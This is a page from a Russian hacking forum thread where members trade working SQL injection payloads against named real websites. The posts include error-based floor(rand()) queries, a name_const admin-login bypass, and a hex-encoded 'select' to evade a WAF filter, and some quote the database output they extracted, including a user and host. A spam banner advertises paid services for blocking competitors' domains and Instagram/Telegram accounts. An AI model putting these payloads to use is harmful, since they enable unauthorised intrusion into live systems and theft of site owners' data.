Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1273 из 1393

1273

Опции темы

Поиск в этой теме

Опции просмотра

#12721

24.04.2010, 06:29

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

народ прошу помоши в раскрутке через floor rand

вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(version(),0x3a,floor(rand()*2)) x%20from%20(select%201%20union%20select%202)a%20gr oup%20by%20x%20limit%201)--

_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(database(),0x3a,floor(rand()*2) )x%20from%20(select%201%20union%20select%202)a%20g roup%20by%20x%20limit%201)--

может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается

#12722

24.04.2010, 07:19

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Просто фильтрация на from information_schema.tables

Последний раз редактировалось Ctacok; 24.04.2010 в 07:26..

#12723

24.04.2010, 09:59

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал через toolza там тоже не пашет

#12724

24.04.2010, 12:25

stasiliy

Новичок

Регистрация: 26.09.2009

Сообщений: 22

Провел на форуме:
44954

Репутация: 0

Цитата:

Сообщение от pinch

как можно обойти фильтрацию на select?? замучался уже стоит WAF

ну могыт так: selselectect )) хз

Мужики))хдд
http://www.bilandima.ru/html/promofoto.php?p=156_anasteshiya' ДИМА БИЛАН))хы

#12725

24.04.2010, 13:51

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

http://www.keyin.ca/news.asp?id=52&news=showall

может найдется чувак который обойдет фильтр на select

#12726

24.04.2010, 14:53

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

http://www.keyin.ca/admin/default.asp

в поле логин admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)--

Цитата:

Duplicate column name '5.0.67.d7-ourdelta-log'

#12727

24.04.2010, 15:01

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

это хорошо..=) но надо select обойти... меня не интересует админский доступ
очень интересует именно обход фильтра на select

#12728

24.04.2010, 15:14

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Цитата:

Сообщение от pinch

Крутите так, какая разница нах...
Какой обход.

' and (select 1 from (select count(0),concat(database(),':',user(),floor(rand(0 )*2)) from (select 1 union select 2 union select 3)x group by 2)a)#

Цитата:

Duplicate entry 'keyincollege:keyincollege@72.167.232.1721' for key 1

ps file_priv у юзера нет!

Последний раз редактировалось Strilo4ka; 24.04.2010 в 15:26..

#12729

24.04.2010, 15:34

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall

#12730

24.04.2010, 16:23

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Цитата:

Сообщение от pinch

http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,version(),5&news =showall

Страница 1273 из 1393

1273

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход